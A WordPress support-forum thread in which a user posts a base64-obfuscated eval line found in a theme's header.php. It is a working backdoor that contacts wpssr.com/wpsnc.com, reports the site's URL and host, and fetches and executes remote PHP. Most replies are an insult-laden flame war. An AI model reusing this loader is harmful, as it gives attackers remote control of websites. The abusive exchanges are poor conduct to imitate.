• Downloaded a theme and found this in header.php. Unfortunately I shortly activated the theme on my server and I am afraid that it did something nasty there

    <?php @eval(@base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3IiOyBlbHNlaWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMyIjsgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OTcgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5MDkyMUU2NEE4MkU3ODM2Nzk3IEFORCBpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSkgeyAgJFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5NiA9ICIxIjsgICRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUgPSAiaHR0cDovL3d3dy4kUjUwRjVGOUM4MEYxMkZGQUU4QjI0MDA1MjhFODFCMzRFLmNvbS93JFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5Ni5waHA/dXJsPSIuIHVybGVuY29kZSgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSkgLiImIi4gImhvc3Q9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSk7ICAkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUpOyAgQGV2YWwoJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCk7IH0gZWxzZSB7ICAkUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2ID0gIjAiOyAgJFI2RTRGMTRCMzM1MjQzQkU2NTZDNjVFM0VEOUUxQjExNSA9ICJodHRwOi8vd3d3LiRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUuY29tL3ckUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2LnBocD91cmw9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIiYiLiAiaG9zdD0iLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKTsgIEByZWFkZmlsZSgkUjZFNEYxNEIzMzUyNDNCRTY1NkM2NUUzRUQ5RTFCMTE1KTsgfSBmY2xvc2UoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNik7')); ?>

Viewing 12 replies - 16 through 27 (of 27 total)
  • no, just to you eric, you brainless girl.

    you talk crap about me and dont have a clue — just makes me laugh

    go sit on irc or s’thing, im sure your highschool buddies are waiting for you…

    furthermore, back on topic, PHP is not going to be viewable in the source of any page — encoded or not.

    Nice try eric.

    like you said before.. dont know much do you. not all coding is php genius. a lot of theme you download these days have the entire footer coded so you cant take out the footer links. This means divs, tables and everything. sorry but i have done this many times and it works perfect everytime.

    the last theme i did this on was https://web2feel.com/2008/05/19/toughpress/ and if you downland youll see the entire footer is coded. just go to the live preview and take the code you need from view source.

    and i think i know php isnt viewable in source genius

    Highschool?…… lmao

    PS, just becouse it has <?php @eval(@base64_decode dont mean its php in the coding

    you ought to take a cue from that other thread where you so politely wrote

    “did you read..”

    this topic isnt about little spam links in the footer. its about PHP. consequently, your ‘advice’ is moot.

    follow?

    and just because .. doesnt matter either, as its already been decoded and thats PHP as well.

    are you following yet?

    like i said… Butt hole lol… and i know what the post is about. i was just giving some advice and tips… much better than what you did.

    i know its tough to have your ass handed to you by a female.. and it probably really hurt your feelings to have me tell your little web site looked like shit in firefox way back when, but why dont you get over it already? You fixed your site.. Do you really have that fragile of an ego?

    you fight with yourself eric, i have much better things to do than play games with 14 year olds.

    that comment really made no sence. and im sorry but the way your site looked back then you had no room to talk. ooo yea may have looked ok in firefox but it looked like crap to your eyes. and a simple google search will show im much older than 14.

    “have your ass handed to you by a female” lmao yea ok .. lmao

    do i have a fragile ego… lol no… but do you really have nothing better to do?

    And while you cant see php in source code you can see the outcome of the php so by viewing source code you can see what php code is there and then make your own header.php… genius

    dude, get it thru your head.. thats NOT sending output to the browser.

    dont you get that? THATS NOT HTML, THATS NOT CSS. ITS PHP

    its executing code.

    Your ‘advice’ is fine when youre working with something that is outputted to the browser — the above is NOT.

    youre making yourself look really dumb arguing with me when you clearly dont understand what we are talking about.

    why dont you go put up your own little webpage and paste that into it. then you can bring that page up in your little browser and marvel at the source you see.

    ill tell you what… give me the theme and if the theme has a live demo give me an hour and ill have a header that is not encoded and works just has it should.. then we will see who is wrong lol. and your making yourself look dumb by saying you have better things to do than argue with me yet you keep doing it.

    heck ill do it without the live demo…. i dont really like to say im better than anyone, but ill be happy to prove im better than you anyday. of all the post on this site 95% of the comments you leave are just crap. you leave these crap comments to try to hurt people just to make yourself feel better. so yea, ill be more than happy to show i know more than you. i say to anyone seeing this to go to your site… and then o to my many many sites and just see who they think knows more…

    im so sorry that this post turned into this fight so i wont be saying anything else in here, so please feel free to get your final words in because i wont say anything back.

    and feel free to come and bash my other post i just left here about my 2 new themes. lol not like your comment have any meaning to them

    ffs, what is wrong with you? the header was fine. it was the code being executed that was the problem.

    do you NOT understand this?

    you can have a page that looks like this, call this header.php:

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="https://www.w3.org/1999/xhtml" dir="ltr" lang="en"><head profile="https://gmpg.org/xfn/11">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>blahblah</title>

    and that you can put this:

    <?php mail();?>

    right after that and the output of the header will be unchanged.

    what was in the PHP above didnt affect the source of the page. Its executing code in the background.

    Can we all be done flexing at each other now?

Viewing 12 replies - 16 through 27 (of 27 total)
  • The topic ‘Nasty base64 code in header.php – Can you decode’ is closed to new replies.